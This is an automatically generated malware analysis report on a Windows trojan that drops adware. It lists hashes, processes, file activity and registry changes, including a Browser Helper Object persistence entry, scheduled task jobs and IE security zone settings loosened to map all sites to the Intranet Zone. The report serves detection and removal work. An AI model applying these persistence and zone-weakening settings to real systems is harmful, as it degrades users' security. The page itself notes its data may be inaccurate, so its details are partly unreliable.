Gen.Variant.Mikey.11140_0a26569297

by malwarelabrobot on August 14th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Mikey.11140 (B) (Emsisoft), Gen:Variant.Mikey.11140 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0a2656929765226281c3bbb0fce9dcc5
SHA1: 6149e4396a7c33efa97da8a5db62357e8f7c2313
SHA256: 21fdfb9d0b8e3f0b7fde4d4831ba8a39b602dfdc306b043c0d388220e168eff0
SSDeep: 24576:6U7Wx/eIT4NkPTZ2 WLcDlvmHrzdoeqhNnz8ioZR74wjY4L436wfyYT6gjTtLXaP:qeIQoTszElviynXoZp904L43F6YT/Pt
Size: 1432064 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-30 12:35:16
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

BROWSE~2.EXE:3920
ins_geforce.exe:2072
ShopperPro.exe:3444
9ba9693.exe:2936
ins_shopperpro.:540
Vxsysrohsgnosa.exe:3856
regsvr32.exe:3680
ping.exe:4080
ping.exe:3592
ping.exe:3920
ping.exe:3900
ping.exe:3776
ping.exe:2296
ping.exe:4016
ping.exe:2472
ping.exe:3672
ping.exe:3148
ping.exe:2960
ping.exe:4008
ping.exe:1544
ping.exe:1540
ping.exe:3364
ping.exe:3692
ping.exe:1652
ping.exe:548
ping.exe:2240
ping.exe:4044
ping.exe:3452
ping.exe:3600
ping.exe:2460
ping.exe:3912
ping.exe:2284
ping.exe:3136
ping.exe:4036
ping.exe:2972
ping.exe:3312
ping.exe:3884
ping.exe:3784
ping.exe:3460
ping.exe:2232
ping.exe:3372
ping.exe:4072
net.exe:3368
net.exe:2624
%original file name%.exe:1076
%original file name%.exe:1704
%original file name%.exe:460
%original file name%.exe:1980
%original file name%.exe:264
ins_sense.exe:2100
sc.exe:2344
sc.exe:3936
setup.exe:3084
setup.exe:3256
Smskc.exe:3904
net1.exe:3800
net1.exe:2732
tcpsvcs.exe:756
0ead95b.exe:2928

The Trojan injects its code into the following process(es):

YTDownloader.exe:3496

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ins_geforce.exe:2072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process ShopperPro.exe:3444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)

The process 9ba9693.exe:2936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\hhmip.dll (2040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Vxsysrohsgnosa.exe (1214930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\krkdagll.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\yllbd.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25213.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Syuzm.tmp (341417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_e (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_d (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_a (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_c (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_b (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\hhmip.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[2].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\krkdagll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Vxsysrohsgnosa.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\yllbd.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Syuzm.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\utility[2].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\utility[1].gif (0 bytes)

The process ins_shopperpro.:540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (86827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup.exe (869966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup1.exe (79085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\D1958.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\D1958.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup1.exe (0 bytes)

The process Vxsysrohsgnosa.exe:3856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Sense\761d4877-9cd4-4df2-ba2a-b233e898173d-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\yllbd.dll (11 bytes)
%WinDir%\Tasks\761d4877-9cd4-4df2-ba2a-b233e898173d-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\452330 (9292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\cuwdhtg.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\qyahrzef.dll (29256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\wxabgab.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\krkdagll.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\355497 (39553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp (4 bytes)
%Program Files%\Sense\utils.exe (65500 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\kpusqxa.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\ztfkyrh.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (541698 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\yllbd.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\452330 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\cuwdhtg.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\qyahrzef.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\wxabgab.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[2] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\krkdagll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\355497 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\kpusqxa.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\ztfkyrh.dll (0 bytes)

The process %original file name%.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\bxsdk32.dll (2386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_geforce.exe (1497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_sense.exe (1501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_shopperpro.exe (31368 bytes)

The process ins_sense.exe:2100 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process setup.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44437 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (48358 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2752 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11027 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4233 bytes)
%Program Files%\YTDownloader\Updater.exe (17866 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10774 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\AccDownload.dll (9226 bytes)
%Program Files%\Common Files\System\SysMenu.dll (15201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (19904 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Program Files%\YTDownloader\converter.exe (61450 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp (0 bytes)

The process setup.exe:3256 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\ShopperPro\Updater.exe (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\MoreInfo.dll (7 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (158611 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\AccDownload.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\System.dll (11 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (6 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\MoreInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\jsdrv.exe (0 bytes)

The process Smskc.exe:3904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Ge-Force\fca20dba-4ecb-4c27-af30-29134a166813-5.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\vbsqyfj.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\btqiknpx.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\kbkvm.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\qoozvalm.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\yfovh.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\413541 (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[2] (40 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\lxpnxblef.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\18420 (38869 bytes)
%Program Files%\Ge-Force\utils.exe (71855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\wgldbpigk.dll (6 bytes)
%WinDir%\Tasks\fca20dba-4ecb-4c27-af30-29134a166813-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj14.tmp (567693 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\vbsqyfj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\btqiknpx.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\kbkvm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\qoozvalm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\yfovh.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\413541 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\lxpnxblef.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\18420 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\wgldbpigk.dll (0 bytes)

The process tcpsvcs.exe:756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\setup1.exe (229796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst5.tmp (240925 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp (0 bytes)

The process 0ead95b.exe:2928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_e (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_d (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_c (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_b (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_a (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Lyqdtqcl.tmp (347770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25213.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Smskc.exe (1247400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\auhdqaj.dll (2021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\qoozvalm.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\lxpnxblef.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Smskc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[2].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Lyqdtqcl.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\auhdqaj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\lxpnxblef.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\qoozvalm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp (0 bytes)

Registry activity

The process BROWSE~2.EXE:3920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 39 77 CE 2E 0B FD 17 30 86 7D 29 89 F2 01 8A"

The process ins_geforce.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 36 B8 EB 3A 55 25 8E 4B 6F BD FA BB 0F 2A CB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"0ead95b.exe" = "0ead95b"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process ShopperPro.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"ExeLocation" = "%Program Files%\ShopperPro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtID" = "ojhagnahfpegocdhlopgljpaafeogmcc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\ShopperPro]
"CONFIGLOCATION" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKLM\SOFTWARE\ShopperPro\ExtraInfo]
"DBVersion" = "1.0.2.0"

[HKLM\SOFTWARE\ShopperPro]
"DBLocation" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"Aff" = "obrdc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\ShopperPro]
"Version" = "3.2.11073.2296"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtFile" = "ShopperPro.crx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 95 9D B4 A6 0D EF FB 93 11 5C C3 99 7B 6A 93"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\ShopperPro]
"UserId" = "99999999-9999-4996-b722-50633741fbe4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

